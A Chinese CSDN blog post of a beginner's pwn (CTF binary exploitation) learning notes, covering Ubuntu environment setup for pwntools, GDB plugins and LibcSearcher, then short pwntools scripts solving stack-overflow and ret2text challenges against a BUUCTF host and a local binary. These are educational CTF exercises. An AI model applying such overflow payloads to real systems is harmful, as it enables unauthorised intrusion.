pwn学习

最新推荐文章于 2024-05-15 08:30:00 发布
最新推荐文章于 2024-05-15 08:30:00 发布
阅读量404 收藏 9
点赞数 6
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80217595/article/details/135167985
版权

一 安装Ubunt系统,配置环境

1、安装 pip

sudo apt-get install python3-pip

检测是否安装成功:pip3 -V

2、安装 vim

sudo apt install vim

检查是否安装成功:vim -v

3、pip 换源

vim ~/.pip/pip.conf

[global]
index-url = https://pypi.tuna.tsinghua.edu.cn/simple

 

换源似乎是有问题

f3d5d6e7a3bf40869e2f15978d6cec20.png

出现问题:“.pip/pip.conf E212:无法打开并写入

出现该问题则说明没有~/.pip/pip.conf这个文件,
先按ESC键,输入:q 不保存文件,退出vi

再根据提示,按ESC键,输入:!强制执行

关闭终端,再“Ctrl+Alt+T”打开终端
使用命令先新建.pip 文件夹,再新建文件 pip.conf
$ cd ~
$ mkdir .pip
$ cd .pip
$ vi pip.conf

再把上面的代码输入,然后 Esc+:w保存并退出

4、安装 pwntools

pip install pwntools

检测是否安装成功

python3
from pwn import *

5、GDB插件

git clone https://github.com/yichen115/GDB-Plugins

在 pwndbg 文件夹(在GDB-Plugins文件夹下)中 git init 初始化一下

似乎是有问题

c2cec87b68e1465188f81666eac963c7.png

安装后就可以安gbd

修改文件格式为fileformat=unix,但发现就是这个格式,根据上面修改过后就安装上了

bash:./setup.sh:权限不够

Esc+:set ff

6、安装 LibcSearcher

git clone https://github.com/Ro0tk1t/LibcSearcher3.git

pip3 install -e LibcSearcher3

玄学,经常安装不上,得看运气

二pwn题

1

获得端口连接靶机,冒号要换成空格,再用ls

用cat 指令获取flag

edf83bf4f1584c2e9322e4b526a6f20f.png

2.rip

栈溢出

构建exp

from pwn import *  
p=remote("node4.buuoj.cn",29244) #靶机地址和端口
payload='A'*15+'B'*8+p64(0x401186+1).decode("iso-8859-1")
#char s的15个字节+RBP的8字节+fun函数入口地址,+1为了堆栈平衡,p64()发送数据时,是发送的字节流,也就是比特流(二进制流)。
p.sendline(payload)
p.interactive()

3.

a4c0de96bb1d47469d21cfa34406bb05.png

 from pwn import *
p=process("./ret2text")
p.recvuntil("do you know anything?\n")
payload=b"a"*112+p32(0x804863a)
p.sendline(payload)
p.interactive()

 

 

东郭野人
关注
PWN学习
csdn159357258456的博客
03-24 388
在程序运行过程中,堆可以提供动态分配的内存,允许程序申请大小未知的内存。堆其实就是程序虚拟地址空间的一块连续的线性区域,它由低地址向高地址方向增长。我们一般称管理堆的那部分程序为堆管理器。响应用户的申请内存请求,向操作系统申请内存,然后将其返回给用户程序。同时,为了保持内存管理的高效性,内核一般都会预先分配很大的一块连续的内存,然后让堆管理器通过某种算法管理这块内存。只有当出现了堆空间不足的情况,堆管理器才会再次与操作系统进行交互。管理用户所释放的内存。
Pwn 环境安装
潜心习安全
10-30 3417
Pwn 环境安装教程
PWN虚拟机配置过程和遇到的问题记录
m0_58824086的博客
07-23 633
想用 peda-heap:echo “source ~/GDB-Plugins/peda-heap/peda.py” > ~/.gdbinit(感觉这个挺好用的,扩展了 heap 的功能,还保留了 peda 的)想用 pwndbg:echo “source ~/GDB-Plugins/pwndbg/gdbinit.py” > ~/.gdbinit。想用 peda:echo “source ~/GDB-Plugins/peda/peda.py” > ~/.gdbinit。
安装pwntools
l2ohvef的博客
12-21 1106
1.按 win+R,输入cmd,分别输入python -version和pip -version,检查是否安装好。注意:如果安装python时没有选择系统配置,是不能正常使用的。2.下载pip,进入pip官网下载pip的压缩包,选择pip-23.3.2.tar.gz3.打开终端,输入pip install pwntools,开始安装
Pwn环境配置】kali安装python2,python3,pip2,pip3及pwntools
weixin_62621015的博客
04-14 2860
因为最近开始学习pwn,我写的脚本需要再python2环境下运行,而pwn库安装在python3,所以需要在python2下载pwntools,过程中遇到了许多问题,特此记录下来方便后续查看。
【Linux】pip国内源配置,pip速度起飞(“.pip/pip.conf” E212: Cannot open file for writing问题解决)
丨晋丨
12-21 6808
方法一:增加配置文件(python2、python3通用,无版本限制) mkdir ~/.pip vim ~/.pip/pip.conf 文件内容: [global] timeout =6000 index-url =http://pypi.douban.com/simple/ [install] use-mirrors =true mirrors =http://pypi.douban.com/simple/ trusted-host =pypi.douban.com 注:pip/pi..
pwn学习历程.pdf
09-30
标题中的“pwn学习历程.pdf”表明该文档是关于学习pwn(利用程序中的漏洞,通常用于CTF(Capture The Flag)比赛中的pwn题目)的详细学习路径和资料汇总。文档的描述中强调了内容的系统性、模块化以及实用性,特别...
Pwn学习路线及学习笔记以及gem安装
10-15
Pwn学习路线及学习笔记 Pwn是计算机安全领域中的一个重要方向,旨在研究和学习 Binary Exploitation,CTF 等安全知识。本文将从Pwn学习路线及学习笔记入手,总结作者在学习Pwn过程中的心得体会和经验。 一、前期...
pwn学习总结(八)—— 堆(持续更新)
01-07
pwn学习总结(八)—— 堆(持续更新)前言chunk使用中(分配后)空闲中(释放后)堆块大小空间复用binsfastbin利用思路unsorted binsmall bin 前言 学习自《glibc内存管理ptmalloc源代码分析》庄明强 著 部分资料...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
CTF:pip安装pwntools最新教程(解决旧版本pip升级问题)
「鸿渐之翼」的博客
07-16 1688
首先从使用命令 $ curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py # 下载安装脚本 $ sudo python get-pip.py # 运行安装脚本 这时候一般会这样的错误(下图)。由于我们不知晓pip的版本,部分pip无法使用-v或者-version参数查看版本,这时候我们观察到提示Please use https://bootstrap.pypa.io/pip/2.7/get-pip.py instead. 我们现在看到提
windows和linux下分别安装pwntools
最新发布
weixin_49765221的博客
05-15 1014
首先可以先安装好python的环境,Python 2.7.9 + 或 Python 3.4+ 以上版本都自带 pip 工具。这个界面就是提示我们已经安装了一个版本的pwntools,我们可以进行更新到最新的版本。然后安装pwntools:pip install pwntools 完成。首先需要安装pip:apt install python3-pippwntools是pwn最常用的一个python包。更新完以后,查看版本的确是最新的版本。然后win+r进入命令行输入界面。
Ubuntu 20.04 引入 pip3 国内源时,提示E212:无法打开并写入文件
manbuyueqiu008的博客
06-25 2704
此时说明没有权限进行编辑,解决方法如下: sudo su // 转为 root 模式 输入密码,进入 root 模式 cd ~ // 进入 根目录 mkdir .pip sudo chmod 777 .pip // 所有人都有 read,write, exectute 权限;rwx 位都对应值为1; cd .pip sudo vim pip.conf 在 vim 中,粘贴下述内容: [global] index-url = https://pypi.tuna.tsinghua.edu.cn/simp
pwntools、pippwndbg安装方法及遇到问题解决汇总
qq_43613772的博客
07-23 1万+
1、首先介绍pwntools,安装好Ubuntu后准备安装tools却发现虚拟机的安装tools选项变为灰色无法点击。首先可以尝试一下重启虚拟机,多试几次。如果还不行的话那就是安装镜像的问题,可以在虚拟机设置里面选择设置选择使用物理驱动器即可。 如下图所示: 无任何问题之后首先进行下载tools工具,点击虚拟机安装虚拟机tools即可 然后打开终端输入命令进行配置,命令如下: 在命令行输入: ...
pwn环境搭建
SDPCTRM的博客
11-21 1697
pwn环境搭建,很全很新
pwntools安装及遇到问题解决
bitsec的专栏
07-11 8465
本安装基于Ubuntu32位系统,系统已经按照python2.7 以及pip。 使用最简单的安装方法: sudo pip install pwntools 但安装出现错误: You must install the Python development headers! $ apt-get install python-dev 转而去安装缺少的包: apt-get install py...
Pwn学习历程(1)--基本工具、交互、调试
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
vim中 E212:无法打开并写入文件 的解决办法
热门推荐
jilitojeek的专栏
12-06 16万+
在编写配置文件时,常常忘记切换到root用户,导致文件编辑完毕,敲入:wq 退出保存时,出现 E212:无法打开并写入文件 的错误提示。这是由于在该目录下当前用户没有写权限导致。 解决办法如下: 1. 将文件保存到用户目录下,再改变所有者,然后移动到配置目录下,步骤如下:    1) 保存退出时用 :wq ! ~/tmp/file.conf    2)su切换到root用户,将file.c
pwntools使用简介
jmp esp
05-07 4万+
0x01 pwntools?pwntools是一个ctf框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。pwntools下载:https://pwntools.com/ 文档在线:http://pwntools.readthedocs.io/en/latest/0x02 使用简介官网的一个简单样例from pwn import * contex
英飞凌TC264学习PWN
10-18
好的,关于英飞凌TC264学习PWN,我可以给你一些指导。 首先,PWN是指利用程序漏洞进行攻击的技术,通常用于渗透测试和漏洞挖掘。而英飞凌TC264是一款基于ARM Cortex-M4内核的微控制器,它的安全性取决于程序的编写...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值